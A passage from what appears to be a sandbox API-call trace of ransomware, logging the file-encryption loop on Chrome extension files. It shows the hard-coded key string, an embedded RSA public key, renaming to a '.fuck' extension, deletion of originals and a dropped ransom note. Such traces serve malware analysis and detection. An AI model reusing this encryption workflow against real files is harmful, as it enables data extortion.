(in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.470] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.470] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.471] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.471] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.471] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.471] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.471] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.471] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.472] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.472] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.472] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.472] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.472] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.472] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.473] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.473] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.473] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.473] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.473] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.473] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.473] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2bf, lpOverlapped=0x0) returned 1 [0263.473] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2bf, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c0) returned 1 [0263.473] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2c0, lpOverlapped=0x0) returned 1 [0263.473] CloseHandle (hObject=0x5d5c) returned 1 [0263.473] CloseHandle (hObject=0x5d60) returned 1 [0263.473] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0263.476] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0263.477] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0263.478] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0263.479] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0263.479] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.479] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.479] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.479] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0263.479] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0263.480] AreFileApisANSI () returned 1 [0263.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.480] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.480] GetFileType (hFile=0x5d64) returned 0x1 [0263.480] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.484] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.484] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.484] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.485] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.485] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.485] GetLastError () returned 0x0 [0263.485] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json")) returned 0x20 [0263.485] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json", dwFileAttributes=0x80) returned 1 [0263.485] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.486] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.487] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.488] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.490] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.490] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.490] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.490] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.490] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.490] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.490] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75198) returned 1 [0263.490] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75198, dwCertEncodingType=0x1, pInfo=0x2eadb70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eadba0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eadba8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e3c0) returned 1 [0263.490] CryptEncrypt (in: hKey=0x2e7e3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.490] CryptEncrypt (in: hKey=0x2e7e3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e749a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e749a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.491] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e749a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e749a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.501] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.501] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.522] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.522] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.522] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.522] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 